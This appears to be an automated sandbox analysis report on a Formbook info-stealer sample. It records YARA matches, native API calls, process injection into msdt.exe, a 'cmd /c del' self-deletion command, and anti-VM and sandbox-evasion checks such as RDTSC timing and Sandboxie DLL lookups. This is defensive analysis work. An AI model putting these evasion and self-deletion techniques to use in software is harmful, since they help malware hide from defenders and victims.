Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_002769C9 0_2_002769C9
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_00276D30 0_2_00276D30
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_002790C0 0_2_002790C0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_002790D0 0_2_002790D0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_0027A44B 0_2_0027A44B
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_00DA67E7 0_2_00DA67E7
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_00DA0048 0_2_00DA0048
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_00DA5C18 0_2_00DA5C18
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_00DA0012 0_2_00DA0012
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_00F57447 0_2_00F57447
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_002700F0 0_2_002700F0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041BA85 2_2_0041BA85
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041C296 2_2_0041C296
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041BBE0 2_2_0041BBE0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00408C6B 2_2_00408C6B
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00408C70 2_2_00408C70
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041C40C 2_2_0041C40C
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041C4F7 2_2_0041C4F7
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041C55C 2_2_0041C55C
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0089E0C6 2_2_0089E0C6
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008CD005 2_2_008CD005
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008A3040 2_2_008A3040
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008B905A 2_2_008B905A
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0089E2E9 2_2_0089E2E9
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00941238 2_2_00941238
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0089F3CF 2_2_0089F3CF
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008C63DB 2_2_008C63DB
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008A2305 2_2_008A2305
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008A7353 2_2_008A7353
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008EA37B 2_2_008EA37B
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008B1489 2_2_008B1489
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008D5485 2_2_008D5485
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008BC5F0 2_2_008BC5F0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008A351F 2_2_008A351F
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008A4680 2_2_008A4680
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008AE6C1 2_2_008AE6C1
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00942622 2_2_00942622
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00F57447 2_2_00F57447
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02641238 4_2_02641238
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0259E2E9 4_2_0259E2E9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025A7353 4_2_025A7353
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025EA37B 4_2_025EA37B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025A2305 4_2_025A2305
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025C63DB 4_2_025C63DB
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0259F3CF 4_2_0259F3CF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025B905A 4_2_025B905A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025A3040 4_2_025A3040
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025CD005 4_2_025CD005
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0259E0C6 4_2_0259E0C6
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02642622 4_2_02642622
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025AE6C1 4_2_025AE6C1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025A4680 4_2_025A4680
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025D57C3 4_2_025D57C3
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025AC7BC 4_2_025AC7BC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0262579A 4_2_0262579A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025B1489 4_2_025B1489
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025D5485 4_2_025D5485
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025A351F 4_2_025A351F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025BC5F0 4_2_025BC5F0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02653A83 4_2_02653A83
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025C7B00 4_2_025C7B00
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0259FBD7 4_2_0259FBD7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0262DBDA 4_2_0262DBDA
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0264CBA4 4_2_0264CBA4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025AC85C 4_2_025AC85C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025C286D 4_2_025C286D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0263F8EE 4_2_0263F8EE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02625955 4_2_02625955
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025B69FE 4_2_025B69FE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025A29B2 4_2_025A29B2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0264098E 4_2_0264098E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025BEE4C 4_2_025BEE4C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025D2E2F 4_2_025D2E2F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025CDF7C 4_2_025CDF7C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025B0F3F 4_2_025B0F3F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025ACD5B 4_2_025ACD5B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025D0D3B 4_2_025D0D3B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0263FDDD 4_2_0263FDDD
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 025E373B appears 238 times
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 0260F970 appears 81 times
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 0259DF5C appears 107 times
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 0259E2A8 appears 38 times
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 025E3F92 appears 108 times
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: String function: 0089DF5C appears 50 times
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: String function: 008E3F92 appears 43 times
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: String function: 008E373B appears 81 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_004185D0 NtCreateFile, 2_2_004185D0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00418680 NtReadFile, 2_2_00418680
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00418700 NtClose, 2_2_00418700
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_004187B0 NtAllocateVirtualMemory, 2_2_004187B0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_004186FA NtClose, 2_2_004186FA
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_004187AA NtAllocateVirtualMemory, 2_2_004187AA
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008900C4 NtCreateFile,LdrInitializeThunk, 2_2_008900C4
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00890048 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_00890048
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00890078 NtResumeThread,LdrInitializeThunk, 2_2_00890078
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008907AC NtCreateMutant,LdrInitializeThunk, 2_2_008907AC
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088F9F0 NtClose,LdrInitializeThunk, 2_2_0088F9F0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088F900 NtReadFile,LdrInitializeThunk, 2_2_0088F900
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_0088FAD0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FAE8 NtQueryInformationProcess,LdrInitializeThunk, 2_2_0088FAE8
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FBB8 NtQueryInformationToken,LdrInitializeThunk, 2_2_0088FBB8
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FB68 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_0088FB68
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FC90 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_0088FC90
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FC60 NtMapViewOfSection,LdrInitializeThunk, 2_2_0088FC60
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FD8C NtDelayExecution,LdrInitializeThunk, 2_2_0088FD8C
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FDC0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_0088FDC0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FEA0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_0088FEA0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_0088FED0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0088FFB4 NtCreateSection,LdrInitializeThunk, 2_2_0088FFB4
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008910D0 NtOpenProcessToken, 2_2_008910D0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00890060 NtQuerySection, 2_2_00890060
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008901D4 NtSetValueKey, 2_2_008901D4
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0089010C NtOpenDirectoryObject, 2_2_0089010C
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00891148 NtOpenThread, 2_2_00891148
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025900C4 NtCreateFile,LdrInitializeThunk, 4_2_025900C4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025907AC NtCreateMutant,LdrInitializeThunk, 4_2_025907AC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_0258FAD0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FAE8 NtQueryInformationProcess,LdrInitializeThunk, 4_2_0258FAE8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FAB8 NtQueryValueKey,LdrInitializeThunk, 4_2_0258FAB8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FB50 NtCreateKey,LdrInitializeThunk, 4_2_0258FB50
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FB68 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_0258FB68
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FBB8 NtQueryInformationToken,LdrInitializeThunk, 4_2_0258FBB8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258F900 NtReadFile,LdrInitializeThunk, 4_2_0258F900
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258F9F0 NtClose,LdrInitializeThunk, 4_2_0258F9F0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_0258FED0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FFB4 NtCreateSection,LdrInitializeThunk, 4_2_0258FFB4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FC60 NtMapViewOfSection,LdrInitializeThunk, 4_2_0258FC60
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FDC0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_0258FDC0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FD8C NtDelayExecution,LdrInitializeThunk, 4_2_0258FD8C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02590048 NtProtectVirtualMemory, 4_2_02590048
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02590078 NtResumeThread, 4_2_02590078
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02590060 NtQuerySection, 4_2_02590060
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025910D0 NtOpenProcessToken, 4_2_025910D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02591148 NtOpenThread, 4_2_02591148
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0259010C NtOpenDirectoryObject, 4_2_0259010C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025901D4 NtSetValueKey, 4_2_025901D4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FA50 NtEnumerateValueKey, 4_2_0258FA50
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FA20 NtQueryInformationFile, 4_2_0258FA20
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FBE8 NtQueryVirtualMemory, 4_2_0258FBE8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258F8CC NtWaitForSingleObject, 4_2_0258F8CC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258F938 NtWriteFile, 4_2_0258F938
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02591930 NtSetContextThread, 4_2_02591930
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FE24 NtWriteVirtualMemory, 4_2_0258FE24
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FEA0 NtReadVirtualMemory, 4_2_0258FEA0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FF34 NtQueueApcThread, 4_2_0258FF34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FFFC NtCreateProcessEx, 4_2_0258FFFC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FC48 NtSetInformationFile, 4_2_0258FC48
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02590C40 NtGetContextThread, 4_2_02590C40
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FC30 NtOpenProcess, 4_2_0258FC30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FC90 NtUnmapViewOfSection, 4_2_0258FC90
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0258FD5C NtEnumerateKey, 4_2_0258FD5C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_02591D80 NtSuspendThread, 4_2_02591D80
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_001185D0 NtCreateFile, 4_2_001185D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_00118680 NtReadFile, 4_2_00118680
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_00118700 NtClose, 4_2_00118700
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_001187B0 NtAllocateVirtualMemory, 4_2_001187B0
Sample file is different than original file name gathered from version info
Source: ejecutable1.exe, 00000000.00000002.406383630.0000000001016000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameIDLFL.exe4 vs ejecutable1.exe
Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameColladaLoader.dll4 vs ejecutable1.exe
Source: ejecutable1.exe, 00000000.00000002.405909286.00000000007A4000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ejecutable1.exe
Source: ejecutable1.exe, 00000000.00000002.406092250.0000000000C80000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs ejecutable1.exe
Source: ejecutable1.exe, 00000002.00000002.443196696.0000000001016000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameIDLFL.exe4 vs ejecutable1.exe
Source: ejecutable1.exe, 00000002.00000003.441170731.00000000028D0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemsdt.exej% vs ejecutable1.exe
Source: ejecutable1.exe, 00000002.00000002.442687115.0000000000B00000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs ejecutable1.exe
PE file contains strange resources
Source: ejecutable1.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\Desktop\ejecutable1.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: ejecutable1.exe Virustotal: Detection: 36%
Source: ejecutable1.exe ReversingLabs: Detection: 13%
Source: ejecutable1.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ejecutable1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\ejecutable1.exe 'C:\Users\user\Desktop\ejecutable1.exe'
Source: C:\Users\user\Desktop\ejecutable1.exe Process created: C:\Users\user\Desktop\ejecutable1.exe C:\Users\user\Desktop\ejecutable1.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable1.exe'
Source: C:\Users\user\Desktop\ejecutable1.exe Process created: C:\Users\user\Desktop\ejecutable1.exe C:\Users\user\Desktop\ejecutable1.exe Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable1.exe' Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@6/0@11/8
Source: C:\Users\user\Desktop\ejecutable1.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: ejecutable1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ejecutable1.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdb source: ejecutable1.exe, msdt.exe
Source: Binary string: msdt.pdb source: ejecutable1.exe, 00000002.00000003.441140636.0000000002880000.00000004.00000001.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: ejecutable1.exe, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.ejecutable1.exe.f50000.3.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.ejecutable1.exe.f50000.4.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_0027EC70 push eax; retn 0027h 0_2_0027EC79
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_00DA44FA push ds; iretd 0_2_00DA44FB
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041B87C push eax; ret 2_2_0041B882
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041B812 push eax; ret 2_2_0041B818
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041B81B push eax; ret 2_2_0041B882
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00415B53 push ds; ret 2_2_00415B1C
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00415B1A push ds; ret 2_2_00415B1C
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00415CE2 push 81CAEFA2h; retf 2_2_00415CE9
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00415F6D push ss; ret 2_2_00415F74
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041B7C5 push eax; ret 2_2_0041B818
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_0259DFA1 push ecx; ret 4_2_0259DFB4
Source: initial sample Static PE information: section name: .text entropy: 6.99789102279

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\msdt.exe Process created: /c del 'C:\Users\user\Desktop\ejecutable1.exe'
Source: C:\Windows\SysWOW64\msdt.exe Process created: /c del 'C:\Users\user\Desktop\ejecutable1.exe' Jump to behavior
Deletes itself after installation
Source: C:\Windows\SysWOW64\cmd.exe File deleted: c:\users\user\desktop\ejecutable1.exe Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ejecutable1.exe PID: 788, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\ejecutable1.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ejecutable1.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000000108604 second address: 000000000010860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 000000000010898E second address: 0000000000108994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\ejecutable1.exe TID: 1480 Thread sleep time: -45730s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe TID: 1348 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
